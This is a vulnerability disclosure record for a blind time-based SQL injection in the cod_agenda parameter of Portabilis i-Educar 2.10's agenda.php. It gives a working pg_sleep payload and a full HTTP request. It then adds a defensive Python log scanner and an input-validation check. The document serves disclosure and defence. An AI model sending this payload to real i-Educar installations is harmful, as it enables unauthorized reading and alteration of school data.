| Field | Value |
|---|---|
| Title | Portabilis i-Educar 2.10 SQL Injection |
| Description | SQL Injection (Blind Time-Based) Vulnerability in cod_agenda Parameter on agenda.php Endpoint |

Summary
A SQL Injection vulnerability was identified in the /intranet/agenda.php endpoint of the i-educar application, specifically in the cod_agenda parameter. This vulnerability allows attackers to execute arbitrary SQL commands on the backend database, potentially compromising the confidentiality, integrity, and availability of application data.
Details
Vulnerable Endpoint: /intranet/agenda.php
Parameter: cod_agenda
The application fails to properly validate and sanitize user input in the cod_agenda parameter. As a result, attackers can inject crafted SQL payloads that are executed directly by the database. This could allow database enumeration, data exfiltration, modification, or denial of service via time-based delays.
PoC
Step by Step:
Access the vulnerable endpoint and click the "Novo Compromisso" button to set up a new entry. Fill in the required fields and click "Salvar". The page automatically redirects to a URL such as: http://localhost:8086/intranet/agenda.php?cod_agenda=2&time=1755283.
image 1: https://github.com/KarinaGante/KGSec/raw/main/CVEs/images/SQLi1.png
image 2: https://github.com/KarinaGante/KGSec/raw/main/CVEs/images/SQLi2.png
image 3: https://github.com/KarinaGante/KGSec/raw/main/CVEs/images/SQLi3.png
Payload:
%27%20AND%204698=(SELECT%204698%20FROM%20PG_SLEEP(5))%20AND%20%27xiCO%27=%27xiCO
Decoded Payload:
' AND 4698=(SELECT 4698 FROM PG_SLEEP(5)) AND 'xiCO'='xiCO
This payload triggers a 5-second delay in the server response, demonstrating that the parameter is vulnerable to blind time-based SQL injection.
Example Request:
GET /intranet/agenda.php?cod_agenda=2%27%20AND%204698=(SELECT%204698%20FROM%20PG_SLEEP(5))%20AND%20%27xiCO%27=%27xiCO HTTP/1.1
Host: localhost:8086
sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Accept-Language: pt-BR,pt;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Cookie: i_educar_session=5AfYtvGRiuEgLBVbvksmwiNSnG75l4waXNMo1PEV
Connection: keep-alive
Normal Request:
image 4: https://github.com/KarinaGante/KGSec/raw/main/CVEs/images/SQLi4.png
SQLi Request:
image 5: https://github.com/KarinaGante/KGSec/raw/main/CVEs/images/SQLi5.png
Observe the increased server response time, confirming that the injected SQL command was executed.
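As an added illustration (not code from the original report or from the i-Educar project), the following Python script applies the two defender-side checks implied by the Details and PoC sections above: the input validation the endpoint lacks (cod_agenda is a record id, so only a plain integer should be accepted) and a log review that flags requests to agenda.php whose cod_agenda value is not an integer, contains a PostgreSQL time-based marker, or coincides with the elevated response time the PoC relies on. The access log lines, their format, and the 3-second slowness threshold are constructed assumptions for the example.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit, parse_qs

# Constructed sample access log (not from the original report). Assumed format:
# client "METHOD target HTTP/1.1" status bytes response_time_seconds
SAMPLE_LOG = """\
10.0.0.5 "GET /intranet/agenda.php?cod_agenda=2&time=1755283 HTTP/1.1" 200 5120 0.041
10.0.0.5 "GET /intranet/agenda.php?cod_agenda=2%27%20AND%204698=(SELECT%204698%20FROM%20PG_SLEEP(5))%20AND%20%27xiCO%27=%27xiCO HTTP/1.1" 200 5120 5.063
10.0.0.9 "GET /intranet/agenda.php?cod_agenda=17 HTTP/1.1" 200 4980 0.038
10.0.0.9 "GET /intranet/index.php HTTP/1.1" 200 2210 0.012
10.0.0.7 "GET /intranet/agenda.php?cod_agenda=abc HTTP/1.1" 200 5120 0.040
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d+) (?P<bytes>\d+) (?P<rt>[\d.]+)$'
)

# i-Educar runs on PostgreSQL; pg_sleep() is the delay primitive used in the PoC.
TIME_BASED_MARKER = re.compile(r'pg_sleep\s*\(', re.IGNORECASE)

# Assumed threshold: normal agenda.php responses in the sample take well under a second.
SLOW_THRESHOLD_S = 3.0


def is_valid_cod_agenda(value: str) -> bool:
    """Mitigation check: cod_agenda identifies a record, so only a plain
    decimal integer is acceptable. Quotes, whitespace or SQL keywords must be
    rejected before the value reaches any query (and the query itself should
    use a bound parameter, not string concatenation)."""
    return re.fullmatch(r'[0-9]+', value) is not None


@dataclass
class Finding:
    ip: str
    cod_agenda: str
    response_time: float
    reasons: list = field(default_factory=list)


def analyze_log(text: str) -> list:
    """Return one Finding per suspicious cod_agenda value seen in agenda.php requests."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not match the assumed format
        parts = urlsplit(m.group('target'))
        if not parts.path.endswith('/intranet/agenda.php'):
            continue
        rt = float(m.group('rt'))
        # parse_qs percent-decodes values and splits each pair on the first '='
        # only, so an injected payload containing '=' stays in one value.
        params = parse_qs(parts.query, keep_blank_values=True)
        for value in params.get('cod_agenda', []):
            reasons = []
            if not is_valid_cod_agenda(value):
                reasons.append('non_integer')
            if TIME_BASED_MARKER.search(value):
                reasons.append('time_based_marker')
            if rt >= SLOW_THRESHOLD_S:
                reasons.append('slow_response')
            if reasons:
                findings.append(Finding(m.group('ip'), value, rt, reasons))
    return findings


if __name__ == '__main__':
    for f in analyze_log(SAMPLE_LOG):
        print(f"{f.ip} rt={f.response_time:.3f}s reasons={','.join(f.reasons)} "
              f"cod_agenda={f.cod_agenda!r}")
```

Run against the sample, the script reports two entries: the request carrying the PoC payload (non-integer value, pg_sleep marker, and a response time above the threshold) and a second request whose cod_agenda is merely non-numeric, which is worth a look even without a delay because the integer check alone is the property the endpoint should enforce.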
Impact
- Unauthorized data access: reading sensitive information such as credentials, personal data, or configuration details.
- Database enumeration: extracting database schema, table, and column details.
- Data manipulation: adding, modifying, or deleting database records.
- Denial of Service (DoS): using time-based queries to impact system availability.
- Potential escalation to RCE: if combined with other vulnerabilities and specific database features.
Finder
Discovered by Karina Gante.

| Field | Value |
|---|---|
| Source | https://github.com/KarinaGante/KGSec/blob/main/CVEs/i-educar/11.md |
| User | karinagante (UID 88113) |
| Submitted | 2025-08-15 21:45 (10 months ago) |
| Moderated | 2025-08-27 09:34 (11 days later) |
| Status | Accepted |
| VulDB entry | 321550 [Portabilis i-Educar up to 2.10 Agenda /intranet/agenda.php cod_agenda SQL Injection] |
| Points | 20 |